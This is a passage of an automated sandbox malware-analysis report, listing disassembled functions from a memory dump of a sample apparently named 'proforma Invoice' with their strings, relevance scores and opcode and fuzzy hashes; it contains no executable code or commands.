                                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                          • Instruction ID: 1659401ceb3b5063e5857c10e149eb98c329c0ea8168facbe6d673ff22cddb90
                                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                          • Instruction Fuzzy Hash: C8C1A031224352AFEB24CE28C841B6FBBE5EFD4318F044A2DF6968BA90D7B4D545CB41
                                                                          Function 011DE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: Legacy$UEFI
                                                                          • API String ID: 2994545307-634100481
                                                                          • Opcode ID: fe84f7e886332553e2d24ab6e8b5076ae9179601793015f5b6afd6ef9861bdc2
                                                                          • Instruction ID: 6ed7a4ac54cd2670471dda803795578caa3297da9553829204457185a377e008
                                                                          • Opcode Fuzzy Hash: fe84f7e886332553e2d24ab6e8b5076ae9179601793015f5b6afd6ef9861bdc2
                                                                          • Instruction Fuzzy Hash: D4619F72E017199FDB29DFA8C981BAEBBB5FF44705F14406DE649EB281D731A900CB50
                                                                          Function 012043D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$MUI
                                                                          • API String ID: 0-17815947
                                                                          • Opcode ID: 8636c99ca020436c1104f5c6f4be54c11c17fdcaf190f09e7dfd2db5422e0fed
                                                                          • Instruction ID: 157c224828dbcafc49326222f4b4c8890948a4e798decfce5963ef35c6839dd8
                                                                          • Opcode Fuzzy Hash: 8636c99ca020436c1104f5c6f4be54c11c17fdcaf190f09e7dfd2db5422e0fed
                                                                          • Instruction Fuzzy Hash: C3513A71D1025EAFDB11DFA9CC80AEEBFBCEB54658F104629E611B7281D731AA05CB60
                                                                          Function 011604E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • kLsE, xrefs: 01160540
                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0116063D
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                          • API String ID: 0-2547482624
                                                                          • Opcode ID: 60fca7e575d897c027f57458aa0b270e97affe313c987b55f12f965caddfcb2f
                                                                          • Instruction ID: ba62ef92127ee671071a7e8dd8a9598052d5a4acad51e38b8a78080fcab92d12
                                                                          • Opcode Fuzzy Hash: 60fca7e575d897c027f57458aa0b270e97affe313c987b55f12f965caddfcb2f
                                                                          • Instruction Fuzzy Hash: A751D2715047428FD729DF28C4406A7BBE9AF88304F10483EF6EA87241E776D955CF92
                                                                          Function 0116A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0116A309
                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0116A2FB
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                          • API String ID: 0-2876891731
                                                                          • Opcode ID: 735de469668cb624392cc90f1e249d16ac53ec8cf0a5b9105a544404148053be
                                                                          • Instruction ID: 1a208212615cd93139e07aa1eab8471568eac797c3ced2c794884a0c8eaea88a
                                                                          • Opcode Fuzzy Hash: 735de469668cb624392cc90f1e249d16ac53ec8cf0a5b9105a544404148053be
                                                                          • Instruction Fuzzy Hash: 5641CD31A08655CBDB2DCF59D840B6EBBB8FF95B04F1440A9EA10EB391E3B6D900CB51
                                                                          Function 0119A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: Cleanup Group$Threadpool!
                                                                          • API String ID: 2994545307-4008356553
                                                                          • Opcode ID: 6edcd158d4c27369ffee779041c4237abc60ca4a540ebeeb051fe7c71ce48150
                                                                          • Instruction ID: 046c67b4d95e80e5f440bc2c70d4c57b0e7c7cd6db4ca6892e95368969bfcc37
                                                                          • Opcode Fuzzy Hash: 6edcd158d4c27369ffee779041c4237abc60ca4a540ebeeb051fe7c71ce48150
                                                                          • Instruction Fuzzy Hash: ED0128B2240704AFD315DF14DD89F167BE9EB84B1AF018939B658C7594E334D808CB86
                                                                          Function 0116C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: MUI
                                                                          • API String ID: 0-1339004836
                                                                          • Opcode ID: aa4a615a4bfa5794f5f55e992de2200a6a2dc57dde4a6268b66791fc00733722
                                                                          • Instruction ID: 6fb6beff6256347f27d72870e2db0887ce990a97137e286b5509433940db240c
                                                                          • Opcode Fuzzy Hash: aa4a615a4bfa5794f5f55e992de2200a6a2dc57dde4a6268b66791fc00733722
                                                                          • Instruction Fuzzy Hash: FB827E75E002188BDF28CFADD880BEDBBB9BF48350F148169D999AB250D7329D51CB91
                                                                          Function 011E6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID: 0-3916222277
                                                                          • Opcode ID: 2b1171ad0399e1dd3e217416b32f34e219fc2dd7001c0772d6418f11b921a7a3
                                                                          • Instruction ID: 79acbd91005d67475fdcaa84a85fec20e041b40d1c0217b3fa081a06700c7483
                                                                          • Opcode Fuzzy Hash: 2b1171ad0399e1dd3e217416b32f34e219fc2dd7001c0772d6418f11b921a7a3
                                                                          • Instruction Fuzzy Hash: BD916071A10619AFEB29EF95CC85FAEBBB8EF18B54F544055F600AB190D774ED00CBA0
                                                                          Function 0119A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: GlobalTags
                                                                          • API String ID: 0-1106856819
                                                                          • Opcode ID: c3d5dd7d389ef919a2be31242dd11d86cd4e5412371e1d6ac3397179e7419ecc
                                                                          • Instruction ID: 83563726af45182aecbd20680b2e10876fa3ff43e28aa38d2a297b0afee76e97
                                                                          • Opcode Fuzzy Hash: c3d5dd7d389ef919a2be31242dd11d86cd4e5412371e1d6ac3397179e7419ecc
                                                                          • Instruction Fuzzy Hash: 807169B5E0071ADFDF2CCF9CD591AADBBB2BF98700F15812AE905A7241E7309941CB60
                                                                          Function 01204978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .mui
                                                                          • API String ID: 0-1199573805
                                                                          • Opcode ID: 5fe0b88c92488ac89675115701f779f580fcfaf5aa0526cc341736fda22a074b
                                                                          • Instruction ID: 28424259b039678805c0529aeb2af8a222ef57c91e20b12587fafba57be5e3ee
                                                                          • Opcode Fuzzy Hash: 5fe0b88c92488ac89675115701f779f580fcfaf5aa0526cc341736fda22a074b
                                                                          • Instruction Fuzzy Hash: AC51CB72D2026A9BDF15EF99D850BAEBBB4BF08704F058269EB11B7291D3745D01CBE0
                                                                          Function 0117E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: EXT-
                                                                          • API String ID: 0-1948896318
                                                                          • Opcode ID: 0cef48a78b2b8287153c84bc351c4e99e18b6c511966f52fbd32a27cb68be3fe
                                                                          • Instruction ID: e568527a139903aa6f2bbc8528e4624d37bbd281608eaa898e28a67e99cdaec6
                                                                          • Opcode Fuzzy Hash: 0cef48a78b2b8287153c84bc351c4e99e18b6c511966f52fbd32a27cb68be3fe
                                                                          • Instruction Fuzzy Hash: C74192725097029BD719DA75C840B6BFBF8AF88718F44496DF584D7240E774D904C793
                                                                          Function 011DC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: BinaryHash
                                                                          • API String ID: 0-2202222882
                                                                          • Opcode ID: 776f9d733ef6512dd7d419787a86254de1fdc3e6a1c9345b6caa1fc8700310a8
                                                                          • Instruction ID: cc39af801bacf83059967efcee193cbfa639c95cb8ed3e09f17edc72ab09db8e
                                                                          • Opcode Fuzzy Hash: 776f9d733ef6512dd7d419787a86254de1fdc3e6a1c9345b6caa1fc8700310a8
                                                                          • Instruction Fuzzy Hash: F64133B1D0052DABDB259A60CC85FDEB77CAB54718F0045A9E708A7140DB709E89CFD4
                                                                          Function 011F6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: #
                                                                          • API String ID: 0-1885708031
                                                                          • Opcode ID: b286b4586cc7a5758feb2df0c7813b6d9456f187f9d1c67d6fa48eda9ce6c6c0
                                                                          • Instruction ID: 51770fac610d3a5355087bdfdb0f8c27a8cfe0c657c92a26f163e2032f85f056
                                                                          • Opcode Fuzzy Hash: b286b4586cc7a5758feb2df0c7813b6d9456f187f9d1c67d6fa48eda9ce6c6c0
                                                                          • Instruction Fuzzy Hash: 8B314B31A007199BEB2ADF69C850BEEBBB8DF45704F54402CEB84AB282C775ED05CB50
                                                                          Function 011DCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: BinaryName
                                                                          • API String ID: 0-215506332
                                                                          • Opcode ID: 30dc03952653d6488036cc65665d577f55103b67a74d666532585d7ad1b65008
                                                                          • Instruction ID: 2d53ac03bad707e315f5c4e4e6c41f6d6555fa796b6517b6e0c95e84fc87ed10
                                                                          • Opcode Fuzzy Hash: 30dc03952653d6488036cc65665d577f55103b67a74d666532585d7ad1b65008
                                                                          • Instruction Fuzzy Hash: 47310376900515AFEB1EDA58C841FAFFB75EB807A4F01492DE901A7250D730EE00DBE0
                                                                          Function 011E892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 011E895E
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                          • API String ID: 0-702105204
                                                                          • Opcode ID: 631d0d9a921b0980f25f9bb34fcf86377da677ffaa1f79c45e27b76ef3d96f3e
                                                                          • Instruction ID: 42fcb232cd72786fb847198e42941a9e3b0aee10f10b3c6bcc749c467ca3b8a7
                                                                          • Opcode Fuzzy Hash: 631d0d9a921b0980f25f9bb34fcf86377da677ffaa1f79c45e27b76ef3d96f3e
                                                                          • Instruction Fuzzy Hash: 9101F732610B06DBEB3D5BD5D8CCA5ABBE5EFC5698B04011CF64147551DB30A881C793
                                                                          Function 01202000 Relevance: .8, Instructions: 757COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 70d18de8d623a5d501d67d3d34b93dacf11ea889a184f809922237b6a4728f57
                                                                          • Instruction ID: f371f469286aaba9ddb829480a1dde37b4f513a072dc4a86231b2286a5c994e4
                                                                          • Opcode Fuzzy Hash: 70d18de8d623a5d501d67d3d34b93dacf11ea889a184f809922237b6a4728f57
                                                                          • Instruction Fuzzy Hash: 9742D635628342DFD716CF68C89462BBBE5EF84304F444A2EFB8197292D770D945CB52
                                                                          Function 011F8158 Relevance: .6, Instructions: 617COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c7a638b7653172f06ba2988d53c921edefd6146ec5bb55641bb16b5a8c2192c1
                                                                          • Instruction ID: df95a54e1964f69aaafca269e19ff39e672456c803b51841c70545044efa1568
                                                                          • Opcode Fuzzy Hash: c7a638b7653172f06ba2988d53c921edefd6146ec5bb55641bb16b5a8c2192c1
                                                                          • Instruction Fuzzy Hash: 61426E75E102198FEB28CF69C881BADBBF5BF88314F14819DEA49EB251D7349981CF50
                                                                          Function 01172840 Relevance: .6, Instructions: 605COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8edd2a5ffd35e1ce0e3bedb8d6b7f2917fc8d9f6e854ba431a9e6df7a5de192a
                                                                          • Instruction ID: b60cb3fb483e893afd59c4d0b88782f2ddcab44b76561bab543a0468e6ea22a2
                                                                          • Opcode Fuzzy Hash: 8edd2a5ffd35e1ce0e3bedb8d6b7f2917fc8d9f6e854ba431a9e6df7a5de192a
                                                                          • Instruction Fuzzy Hash: EE32CC70A007658BDB2DCF69C8447BEBBF2BFA4B04F24411DD58A9B385E735A842CB51
                                                                          Function 0120A118 Relevance: .6, Instructions: 591COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 63b1b1cd66e864025271d26c173fcb372ab16cf03c9c8bb266e6e48f6649e70b
                                                                          • Instruction ID: ed0d963c6c2d34dd2dbc0f84ad809614ab1ffcda6e1a7c63dce41df0542a3ed6
                                                                          • Opcode Fuzzy Hash: 63b1b1cd66e864025271d26c173fcb372ab16cf03c9c8bb266e6e48f6649e70b
                                                                          • Instruction Fuzzy Hash: BA22BC746347628FEB26CF29C491376BBF1AF44340F88865ADA868B2D7D375D442CB60
                                                                          Function 01188DBF Relevance: .6, Instructions: 554COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 48588f42f3c54ffa813036364ffef75c083b50e9fcf60fb99df77e1e8609c068
                                                                          • Instruction ID: 2f6c7f83dc2d8bd5b1ca40564dc167bffc8dbf9429bf7b70f89481bb9817d947
                                                                          • Opcode Fuzzy Hash: 48588f42f3c54ffa813036364ffef75c083b50e9fcf60fb99df77e1e8609c068
                                                                          • Instruction Fuzzy Hash: 3A227B70E0021A9BCF1DDF99D4809BEFBF2BF94704B55806AE945AB241E734DD42CBA1
                                                                          Function 01166A50 Relevance: .5, Instructions: 548COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cacb7fb75e7c18f40686ed47357bdcbd2dcf24f596633418b5d1648a62b25232
                                                                          • Instruction ID: b0321d76f282e2d9569339be50d74b6ad773135f5be145f8f1911dc9693bcd08
                                                                          • Opcode Fuzzy Hash: cacb7fb75e7c18f40686ed47357bdcbd2dcf24f596633418b5d1648a62b25232
                                                                          • Instruction Fuzzy Hash: 3C32EE70A00205DFDB29CF68C480BAEBBF5FF58310F248569E956AB392D735E851CB91
                                                                          Function 01184A35 Relevance: .4, Instructions: 423COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                          • Instruction ID: 2dabf294e5907accd25e09640f0a8cd5b0d63825de05d2ee86e7b4d4027566bb
                                                                          • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                          • Instruction Fuzzy Hash: E2F18D71E0021A9BDB1DDF99C580BAEBBF5AF58754F098129E905EB740EB34D841CF60
                                                                          Function 011F892B Relevance: .4, Instructions: 386COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: df0d31703cf25dfc7ba9755369ad239a12e3e7ee635902cf4a07098190971424
                                                                          • Instruction ID: 3b49490a416bfa9b4023b6f449a9e50d51762df56f1b53662fcfc41ae7888f58
                                                                          • Opcode Fuzzy Hash: df0d31703cf25dfc7ba9755369ad239a12e3e7ee635902cf4a07098190971424
                                                                          • Instruction Fuzzy Hash: BAD1D171A0060A9BDF1DCF69C841BFEB7B1BF88304F19816DDA55A7281E735E9068B60
                                                                          Function 011665D0 Relevance: .4, Instructions: 383COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6e398dba29f890b5137a9f6fd43762fb202583f27654d154ea9911f224457e2b
                                                                          • Instruction ID: f2682b05575b95ed12dae4a7822182dcde88f8759087b52578d9ca87bf21fbb7
                                                                          • Opcode Fuzzy Hash: 6e398dba29f890b5137a9f6fd43762fb202583f27654d154ea9911f224457e2b
                                                                          • Instruction Fuzzy Hash: 6FE1C271608342DFC719CF28C090A6ABBF5FF89304F058A6DE99587351E732E915CB92
                                                                          Function 01158397 Relevance: .4, Instructions: 380COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8f8ace49db29da98d497b73fd68e7973506ed51c3496edba182afd115006c56e
                                                                          • Instruction ID: c6b70f4b38d42c56bbcd9421c95294f520896146164a28f7dd307c716565c428
                                                                          • Opcode Fuzzy Hash: 8f8ace49db29da98d497b73fd68e7973506ed51c3496edba182afd115006c56e
                                                                          • Instruction Fuzzy Hash: 4CD1D371A00606DBDB5CDF6AC8D0AFAB7A5BF54308F05462DED26DB280E730E951CB61
                                                                          Function 011E8243 Relevance: .3, Instructions: 322COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                          • Instruction ID: aa462e2eedf80144416352f76802de1eaf3d227add5d37bfa5585f7cd00dfa33
                                                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                          • Instruction Fuzzy Hash: 1CB14274A00A06AFDF29DFD9C948AABBBF9FF84304F14445DAA4297790DB34E945CB10
                                                                          Function 01170535 Relevance: .3, Instructions: 300COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                          • Instruction ID: d0e588a3b9d0512b425704ce20ade601396ad68eba9e380bdd58a8b54a1957e6
                                                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                          • Instruction Fuzzy Hash: 89B13431604746AFDB2DCB68C860BBEBBF6AF99604F150158E652DB381DB30ED41CB91
                                                                          Function 011683C0 Relevance: .3, Instructions: 281COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b178549d4fe3c2fd6b9f646376500fd3d073cc53952850d7ae29152e41047dce
                                                                          • Instruction ID: 566769a8a373f9e0e5ed55d376fb107ed8055597e0e0f38741e29072d944a487
                                                                          • Opcode Fuzzy Hash: b178549d4fe3c2fd6b9f646376500fd3d073cc53952850d7ae29152e41047dce
                                                                          • Instruction Fuzzy Hash: 02C17974108341DFD768CF18C484BABB7E8BF98708F44495DE98987291E775EA08CF92
                                                                          Function 0115C427 Relevance: .3, Instructions: 280COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5ef2455be5757cfbf2bdf2be003a1bf2823239269f6507db9356582d74db7792
                                                                          • Instruction ID: 5943be7eba3ce00281b4322afc23d41d56f153af34bd57dbfb099f1e2a244276
                                                                          • Opcode Fuzzy Hash: 5ef2455be5757cfbf2bdf2be003a1bf2823239269f6507db9356582d74db7792
                                                                          • Instruction Fuzzy Hash: 7BB19370B10265CBDB68CF58C890BA9B7F5EF44704F0485E9D91AE7241EB709E86CF61
                                                                          Function 0118E5E7 Relevance: .3, Instructions: 278COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e51fdff929ff5436a95421b466f770d3bb8c4593daf7e7b7dd930e006f73a173
                                                                          • Instruction ID: 7337020da4841513c94dceac6b464b63d4e9c904307f22b7e4bb0d204e6c9a39
                                                                          • Opcode Fuzzy Hash: e51fdff929ff5436a95421b466f770d3bb8c4593daf7e7b7dd930e006f73a173
                                                                          • Instruction Fuzzy Hash: 2EA15931E01616AFEB2DEB9CC848FADBBB5AF00B18F154115EA11A7290D7749D41CFD1
                                                                          Function 011A0185 Relevance: .3, Instructions: 276COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
